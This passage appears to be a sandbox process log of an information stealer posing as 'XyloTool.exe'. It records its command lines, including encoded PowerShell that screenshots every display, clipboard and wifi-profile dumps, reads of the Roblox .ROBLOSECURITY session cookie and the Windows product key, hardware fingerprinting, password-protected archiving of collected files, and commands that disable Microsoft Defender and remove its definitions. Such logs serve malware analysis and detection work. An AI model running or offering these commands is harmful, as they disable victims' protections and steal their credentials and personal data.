HkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c2fwqu54\c2fwqu54.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EBB.tmp" "c:\Users\Admin\AppData\Local\Temp\c2fwqu54\CSCF122D94BDFBC4FEFB711E6E59DA1EBB.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\IFuAT.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\IFuAT.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.36.471017351\488335513" -childID 33 -isForBrowser -prefsHandle 10228 -prefMapHandle 5912 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b765b09c-523a-428e-a215-a5040bf5dbcf} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 3112 2fed0de8858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.37.1930599041\747725068" -childID 34 -isForBrowser -prefsHandle 10224 -prefMapHandle 6420 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c59decf-f162-4658-a7c0-34cf417a7b45} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 4264 2fed0f8dc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.38.728469841\746336893" -childID 35 -isForBrowser -prefsHandle 6384 -prefMapHandle 8832 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d34940b5-6e49-481a-b320-a6623b6a5087} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7004 2febe978d58 tab
C:\Users\Admin\Desktop\XyloTool.exe
"C:\Users\Admin\Desktop\XyloTool.exe"
C:\Users\Admin\Desktop\XyloTool.exe
"C:\Users\Admin\Desktop\XyloTool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC